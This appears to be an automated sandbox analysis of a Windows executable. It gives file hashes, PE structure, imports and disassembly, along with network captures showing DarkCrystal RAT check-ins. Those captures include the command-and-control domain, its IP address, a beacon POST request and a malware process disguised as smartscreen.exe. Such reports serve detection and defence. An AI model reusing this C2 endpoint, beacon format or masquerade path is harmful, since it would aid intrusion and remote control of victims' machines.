                                                            Entropy (8bit):7.385511577553731
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:EjS7Q5fFCE.exe
                                                            File size:2'009'852 bytes
                                                            MD5:5fa3d2d795206f9981b7bd191c423d65
                                                            SHA1:e4fb0a0e2c1dc7c1bca06c791ad1ad05a67016ca
                                                            SHA256:0a9c437939c86beb90ce02ac853983c7daca5d801489b81f537d6c9b9c4796b3
                                                            SHA512:949e3575a28fe72e4de9d2ef30250a73f912ffc7cd42bb83e465bf8201453bc26c1dd79ce3adc90b2253a5d2b9fa778dff91ef768d8790c500d20defddc5802e
                                                            SSDEEP:24576:2TbBv5rUyXVCBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo0F:IBJu4788WhV89R243rZ4fxR1EJuZJr
                                                            TLSH:3F95AE166AD25E37C26427B18557403D93B4D7323A72EF0B361F24A5AC13BF5CA332A6
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                            File Icon

                                                            Icon Hash:1515d4d4442f2d2d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007FC390878E9Bh
                                                            jmp 00007FC3908787ADh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FC39086B5F7h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FC39087BC3Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FC39087893Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FC390877EF9h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FC39086B572h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FC39087B6F9h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FC3908788B8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FC39087B6DCh
                                                            int3
                                                            jmp 00007FC39087D177h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                            PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                            RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                            RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                            RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                            RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                            RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                            RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                            RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                            RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                            RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                            RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                            RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                            RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                            RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                            RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                            RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                            RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                            RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                            RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                            RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                            RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                            RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                            RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                            RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                            RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                            RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-28T23:47:51.521067+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736172.67.186.20080TCP
                                                            2024-12-28T23:48:01.271035+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449737172.67.186.20080TCP
                                                            2024-12-28T23:48:06.317910+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449739172.67.186.20080TCP
                                                            2024-12-28T23:48:09.817923+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449746172.67.186.20080TCP
                                                            2024-12-28T23:48:13.771059+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449757172.67.186.20080TCP
                                                            2024-12-28T23:48:18.317923+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449768172.67.186.20080TCP
                                                            2024-12-28T23:48:21.474187+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449773172.67.186.20080TCP
                                                            2024-12-28T23:48:44.661706+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449825172.67.186.20080TCP
                                                            2024-12-28T23:48:53.021104+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449845172.67.186.20080TCP
                                                            2024-12-28T23:49:01.349232+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449863172.67.186.20080TCP
                                                            2024-12-28T23:49:10.364878+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449883172.67.186.20080TCP
                                                            2024-12-28T23:49:13.583634+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449892172.67.186.20080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 23:47:50.140027046 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:50.262155056 CET8049736172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:50.262259007 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:50.332626104 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:50.452173948 CET8049736172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:50.678116083 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:50.797688961 CET8049736172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:51.346797943 CET8049736172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:51.521066904 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:51.580703020 CET8049736172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:51.630399942 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:51.963726997 CET4973680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:59.866179943 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:59.985748053 CET8049737172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:47:59.986095905 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:47:59.986454964 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:00.106019974 CET8049737172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:00.333673954 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:00.453438044 CET8049737172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:01.071428061 CET8049737172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:01.271034956 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:01.308924913 CET8049737172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:01.380403996 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:01.688787937 CET4973780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:04.894881964 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:05.014389038 CET8049739172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:05.014457941 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:05.014668941 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:05.134144068 CET8049739172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:05.364931107 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:05.484411001 CET8049739172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:06.191646099 CET8049739172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:06.317909956 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:06.443243027 CET8049739172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:06.523104906 CET4973980192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:08.523077011 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:08.642743111 CET8049746172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:08.643501043 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:08.643814087 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:08.763187885 CET8049746172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:08.990158081 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:09.110080004 CET8049746172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:09.775778055 CET8049746172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:09.817923069 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:10.018197060 CET8049746172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:10.130420923 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:10.394036055 CET4974680192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:12.268333912 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:12.387922049 CET8049757172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:12.391525984 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:12.392735958 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:12.512219906 CET8049757172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:12.744767904 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:12.865166903 CET8049757172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:13.569377899 CET8049757172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:13.771059036 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:13.823133945 CET8049757172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:13.880408049 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:13.901690960 CET4975780192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:17.009372950 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:17.129220963 CET8049768172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:17.129364014 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:17.129587889 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:17.249151945 CET8049768172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:17.476095915 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:17.595748901 CET8049768172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:18.263000965 CET8049768172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:18.317923069 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:18.505753994 CET8049768172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:18.552308083 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:19.207854033 CET4976880192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:20.218074083 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:20.337730885 CET8049773172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:20.337861061 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:20.338089943 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:20.457554102 CET8049773172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:20.693634033 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:20.813298941 CET8049773172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:21.422271013 CET8049773172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:21.474186897 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:21.657381058 CET8049773172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:21.708560944 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:22.044748068 CET4977380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:43.403095007 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:43.522725105 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:43.522800922 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:43.523001909 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:43.642471075 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:43.881140947 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:44.000668049 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:44.618026972 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:44.661705971 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:44.855725050 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:44.911715984 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:45.047370911 CET8049825172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:45.099200010 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:45.138253927 CET4982580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:51.712645054 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:51.832331896 CET8049845172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:51.832406998 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:51.832592010 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:51.952039957 CET8049845172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:52.177519083 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:52.297032118 CET8049845172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:52.963706017 CET8049845172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:53.021104097 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:53.205905914 CET8049845172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:48:53.259231091 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:48:53.589023113 CET4984580192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:00.080580950 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:00.200141907 CET8049863172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:00.200212955 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:00.200450897 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:00.319869041 CET8049863172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:00.552496910 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:00.672033072 CET8049863172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:01.284025908 CET8049863172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:01.349231958 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:01.516635895 CET8049863172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:01.568087101 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:02.180197954 CET4986380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:09.019665956 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:09.139487982 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:09.141585112 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:09.141928911 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:09.261359930 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:09.490153074 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:09.609787941 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:10.318157911 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:10.364877939 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:10.575022936 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:10.630513906 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:10.658638000 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.284626961 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.404416084 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:12.404476881 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.404839993 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.524411917 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:12.755798101 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.875242949 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.536200047 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.583633900 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:13.777905941 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.833746910 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:13.851995945 CET4989280192.168.2.4172.67.186.200

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 23:47:48.947277069 CET6405453192.168.2.41.1.1.1
                                                            Dec 28, 2024 23:47:49.345412016 CET53640541.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 28, 2024 23:47:48.947277069 CET192.168.2.41.1.1.10x8bf2Standard query (0)001031cm.nyashteam.ruA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 28, 2024 23:47:49.345412016 CET1.1.1.1192.168.2.40x8bf2No error (0)001031cm.nyashteam.ru172.67.186.200A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 23:47:49.345412016 CET1.1.1.1192.168.2.40x8bf2No error (0)001031cm.nyashteam.ru104.21.2.8A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 001031cm.nyashteam.ru

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449736172.67.186.200801028C:\Windows\Resources\Themes\smartscreen.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:47:50.332626104 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
